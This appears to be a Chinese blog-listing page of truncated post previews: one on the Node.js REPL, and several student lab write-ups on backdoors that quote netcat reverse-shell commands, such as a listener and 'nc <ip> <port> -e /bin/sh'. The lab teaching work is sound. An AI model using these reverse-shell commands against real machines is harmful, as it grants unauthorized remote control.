Node.js REPL(Read Eval Print Loop:交互式解释器) 表示一个电脑的环境,类似 Window 系统的终端(cmd)或 Unix/Linux shell,我们可以在终端中输入命令,并接收系统的响应。 Node 自带了交互式解释器,可以执行以下任务: 读取 - 读取用户输入 ...
分类:
Web程序 时间:
2018-04-09 19:01:22
阅读次数:
188
一、实验操作步骤 1.Windows获得Linux Shell ipconfig查询Windows主机IP地址 在Windows中输入win+r→cmd→cd→ncat目录文件→ncat.exe -l -p 4310(监听端口) 在Linux输入 nc 192.168.1.185 4311 -e / ...
分类:
其他好文 时间:
2018-04-03 21:56:56
阅读次数:
171
2017 2018 2 20155231《网络对抗技术》实验二:后门原理与实践 常用后门工具 Windows获得Linux的Shell 在本机 中使用 获得windows的IP地址 1.windows 打开监听 2.Linux反弹连接win 3.windows下获得一个linux shell,可运行 ...
分类:
其他好文 时间:
2018-04-03 19:13:11
阅读次数:
163
实验二 后门原理与实践 1.Windows获得Linux Shell 在windows下,打开CMD,使用ipconfig指令查看本机IP 监听本机的5236端口 在kali端,使用nc指令的 e选项,nc XXX.XXX.XXX.XXX(主机ip) 5236(所设置的端口) e /bin/sh反向 ...
分类:
其他好文 时间:
2018-04-01 19:55:52
阅读次数:
192
20155334 曹翔 Exp2 后门原理与实践 不多废话直接上实验过程,本实验的所有端口都是5334。 一、实验过程 查询主机Windows和虚拟机kali的ip地址: 1. Windows获得Linux Shell 1. 使用ncat.exe程序监听本机的5334端口: 2. 在Kali环境下, ...
分类:
其他好文 时间:
2018-04-01 18:48:32
阅读次数:
167
20155218《网络对抗》Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用ncat.exe程序监听本机的5218端口,在Kali环境下,使用nc指令的 e选项反向连接Windows主机的52 ...
分类:
其他好文 时间:
2018-04-01 01:01:39
阅读次数:
288